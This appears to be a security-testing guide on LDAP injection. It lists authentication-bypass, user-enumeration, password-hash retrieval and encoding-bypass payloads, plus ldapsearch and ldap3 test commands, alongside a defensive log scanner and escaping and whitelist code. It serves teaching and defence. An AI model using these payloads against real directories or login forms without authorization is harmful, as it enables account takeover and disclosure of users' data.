ldap-injection-testing


LDAP Injection Vulnerability Testing

Overview

LDAP injection is a vulnerability analogous to SQL injection: user input is concatenated into an LDAP search filter, so an attacker can alter the filter's logic, which may lead to information disclosure, authentication or authorization bypass, and similar impacts. This skill covers detection, exploitation, and prevention of LDAP injection.

Vulnerability Principle

Applications concatenate user input directly into LDAP search filters without sufficient validation or escaping, which lets an attacker change the query logic.
Dangerous code example:
```java
// Vulnerable: userInput and password are concatenated into the filter unescaped
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);
```

LDAP Basics

Query Syntax

Basic Queries:
(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))

Special Characters

Characters requiring escaping:
  • ( ) - parentheses
  • * - wildcard
  • \ - escape character
  • / - path separator
  • NUL - null character

Testing Methods

1. Identify LDAP Input Points

Common Functions:
  • User login
  • User search
  • Directory browsing
  • Permission verification

2. Basic Detection

Test Special Characters:
*)(&
*)(|
*))(
*))%00
Test Logical Operators:
*)(&(cn=*
*)(|(cn=*
*))(!(cn=*

3. Authentication Bypass

Basic Bypass:
Username: *)(&
Password: *
Query: (&(cn=*)(&)(userPassword=*))
More Precise Bypass:
Username: admin)(&(cn=admin
Password: *))
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))

4. Information Disclosure

Enumerate Users:
*)(cn=*
*)(uid=*
*)(mail=*
Retrieve Attributes:
*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*

Exploitation Techniques

Authentication Bypass

Method 1: Logical Bypass
Input: *)(&
Query: (&(cn=*)(&)(userPassword=*))
Result: Matches all users
Method 2: Comment Bypass
Input: admin)(&(cn=admin
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))
Method 3: Wildcard
Input: *)(|(cn=*)(userPassword=*
Query: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))

Information Disclosure

Enumerate All Users:
Search: *)(cn=*
Result: Returns all cn attributes
Retrieve Password Hashes:
Search: *)(|(cn=*)(userPassword=*
Result: Returns users and password hashes
Retrieve Sensitive Attributes:
Search: *)(|(cn=*)(mail=*)(telephoneNumber=*
Result: Returns multiple sensitive attributes

Privilege Escalation

Modify Query Logic:
Original: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
Injection: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
Result: May bypass permission checks

Bypass Techniques

Encoding Bypass

URL Encoding:
*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C
Unicode Encoding:
* → \u002A
( → \u0028
) → \u0029

Comment Bypass

Using Comments:
*)(&(cn=*
*)(|(cn=*

Null Character Injection

Using NULL Byte:
*))%00
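A defensive counterpart to the Basic Detection payloads and the Encoding and Null Character bypasses above. This is an added example, not part of the original page: it scans constructed web-server access-log lines, decodes each query parameter (repeated URL decoding plus `\uXXXX` Unicode escapes, so `%2A%29%28%26`, `%2500` and `\u002A` are all normalised), and flags values containing the filter-breaking sequences listed on this page. The log lines, parameter names and function names are all constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qsl, unquote

# Sequences that indicate filter manipulation rather than a stray character:
# a closing paren followed by a new operator or attribute, a wildcard used to
# close a value, or an injected NUL byte.
INJECTION_PATTERNS = [
    re.compile(r'\)\s*\(\s*[&|!]'),    # ")(&", ")(|", ")(!"
    re.compile(r'\*\s*\)'),            # "*)"  wildcard terminating a value
    re.compile(r'\)\s*\(\s*\w+='),     # ")(cn="  a new attribute assertion
    re.compile(r'\x00'),               # NUL byte left after decoding %00
]

UNICODE_ESC = re.compile(r'\\u([0-9a-fA-F]{4})')

def decode_param(value, max_rounds=3):
    """Normalise a parameter value: bounded repeated URL decoding plus \\uXXXX escapes."""
    for _ in range(max_rounds):
        decoded = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), unquote(value))
        if decoded == value:
            break
        value = decoded
    return value

def classify_value(value):
    """Return (decoded value, list of matched patterns) for one parameter value."""
    decoded = decode_param(value)
    reasons = [p.pattern for p in INJECTION_PATTERNS if p.search(decoded)]
    return decoded, reasons

def scan_access_log(lines):
    """Parse constructed Apache-style log lines; return one finding per suspicious parameter."""
    findings = []
    req_re = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = req_re.search(line)
        if not m:
            continue
        # parse_qsl performs the first URL decode; decode_param handles further layers
        for name, raw in parse_qsl(urlparse(m.group(1)).query, keep_blank_values=True):
            decoded, reasons = classify_value(raw)
            if reasons:
                findings.append({'param': name, 'decoded': decoded, 'reasons': reasons})
    return findings

# Constructed sample log lines (not from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login?user=alice&pass=s3cret HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=%2A%29%28%26&pass=%2A HTTP/1.1" 200 9120',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%2A%29%29%2500 HTTP/1.1" 500 88',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=john.doe%40example.com HTTP/1.1" 200 301',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /login?user=%5Cu002A%29%28%7C&pass=x HTTP/1.1" 200 9120',
]

if __name__ == '__main__':
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The decoding is bounded to three rounds so a value such as `%25%25...` cannot make the scanner loop indefinitely, and the NUL check runs on the decoded value, which is where `%2500` and `%00` end up as the same byte. A legitimate value with a single `*` (a wildcard search) is not flagged; only the combinations that close an assertion and open a new one are.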

Tool Usage

JXplorer

Graphical LDAP Client:
  • Connect to LDAP server
  • Browse directory structure
  • Execute query tests

ldapsearch

```bash
# Basic query
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"

# Test injection
# Note: ldapsearch parses the filter itself, so a malformed filter such as this one
# is rejected client-side ("Bad search filter") rather than sent to the server.
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"
```

Burp Suite

  1. Intercept LDAP query requests
  2. Modify query parameters
  3. Observe response results

Python Script

```python
import ldap3

server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
                        user='cn=admin,dc=example,dc=com',
                        password='password')
conn.bind()  # the connection must be bound before searching

# Test injection
# Note: ldap3 validates filter syntax client-side, so a malformed filter raises
# LDAPInvalidFilterError instead of being sent to the server.
filter_str = '*)(&'
conn.search('dc=example,dc=com', filter_str)
print(conn.entries)
```

Verification and Reporting

Verification Steps

  1. Confirm control over LDAP queries
  2. Verify authentication bypass or information disclosure
  3. Assess impact (unauthorized access, data leakage, etc.)
  4. Record complete POC

Report Key Points

  • Vulnerability location and input parameters
  • LDAP query construction method
  • Complete exploitation steps and PoC
  • Fix recommendations (input validation, parameterized queries, etc.)

Prevention Measures

Recommended Solutions

  1. Input Validation
    ```java
    import java.util.Arrays;

    // Metacharacters that must not reach the filter unescaped.
    // Note: RFC 4515 specifies the hex form (e.g. "\2a" for "*"); the
    // backslash-prefix form used here is what this page demonstrates.
    private static final String[] LDAP_ESCAPE_CHARS =
        {"\\", "*", "(", ")", "\0", "/"};

    public static String escapeLDAP(String input) {
        if (input == null) {
          return null;
        }
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
          char c = input.charAt(i);
          if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
            sb.append("\\");
          }
          sb.append(c);
        }
        return sb.toString();
    }
    ```
  2. Parameterized Queries
    ```java
    // Use the parameterized functionality of the LDAP API
    String filter = "(&(cn={0})(userPassword={1}))";
    Object[] args = {escapedCN, escapedPassword};
    // Build the query through the API so values are never spliced into the filter string
    ```
  3. Whitelist Validation
    ```java
    // Only allow specific characters
    if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
        throw new IllegalArgumentException("Invalid input");
    }
    ```
  4. Least Privilege
    • Use accounts with minimal privileges for LDAP connections
    • Restrict queryable attributes
    • Use access control lists
  5. Error Handling
    • Do not return detailed error information
    • Use unified error responses
    • Record error logs
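The escaping and whitelist steps above, worked through in Python (the language of this page's test script) against the payloads listed earlier on the page. This is an added example and not the page's own code: `escape_filter_value` applies the `\XX` hex escaping RFC 4515 specifies for `\ * ( )` and NUL (plus `/`, which the page also lists), `build_login_filter` places the escaped values into the same filter template the vulnerable Java snippet uses, `is_allowed_identifier` is the page's whitelist regex, and `matches_template` is a structural check that counts parentheses. All function names are my own.

```python
import re

# RFC 4515: these characters inside an assertion value are written as \XX (hex of the byte).
# "/" is not a filter metacharacter in the RFC but the page lists it, and escaping it is harmless.
_ESCAPE_MAP = {
    '\\': r'\5c',
    '*': r'\2a',
    '(': r'\28',
    ')': r'\29',
    '\x00': r'\00',
    '/': r'\2f',
}

def escape_filter_value(value: str) -> str:
    """Escape one user-supplied value for use inside an LDAP search filter."""
    return ''.join(_ESCAPE_MAP.get(ch, ch) for ch in value)

WHITELIST = re.compile(r'^[a-zA-Z0-9@._-]+$')  # same pattern as the Java example

def is_allowed_identifier(value: str) -> bool:
    """Whitelist check for identifier-like input such as a username."""
    return bool(WHITELIST.match(value))

def build_login_filter_unsafe(username: str, password: str) -> str:
    """The page's vulnerable construction, kept only for comparison."""
    return '(&(cn=' + username + ')(userPassword=' + password + '))'

def build_login_filter(username: str, password: str) -> str:
    """Hardened construction: reject out-of-whitelist usernames, escape every value."""
    if not is_allowed_identifier(username):
        raise ValueError('username contains characters outside the allowed set')
    return '(&(cn=%s)(userPassword=%s))' % (
        escape_filter_value(username), escape_filter_value(password))

def matches_template(filter_str: str) -> bool:
    """Structural check: the login template has exactly three '(' and three ')'.
    Escaped values add no parentheses, so any other count means a value broke out."""
    return filter_str.count('(') == 3 and filter_str.count(')') == 3

if __name__ == '__main__':
    # Payloads from the page, constructed input for the demo
    for user, pw in [('*)(&', '*'), ('admin)(&(cn=admin', '*))'), ('alice', 'p)(cn=*')]:
        unsafe = build_login_filter_unsafe(user, pw)
        print('unsafe  :', unsafe, '| template intact:', matches_template(unsafe))
        try:
            safe = build_login_filter(user, pw)
            print('hardened:', safe, '| template intact:', matches_template(safe))
        except ValueError as exc:
            print('hardened: rejected ->', exc)
```

Two points worth noting. First, escaping and whitelisting are complementary: the whitelist is applied to the username, where a narrow character set is acceptable, while the password is only escaped, so a password such as `p)(cn=*` still reaches the directory as a literal value rather than as three assertions. Second, comparing `userPassword` inside a filter is the page's template, reproduced here for the comparison; in practice a password is verified by binding as the user, not by searching on the attribute. If the application already uses ldap3, `ldap3.utils.conv.escape_filter_chars` provides the same RFC 4515 escaping.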

Notes

  • Only perform in authorized testing environments
  • Note syntax differences between different LDAP servers
  • Avoid impacting the directory during testing
  • Understand the target LDAP server configuration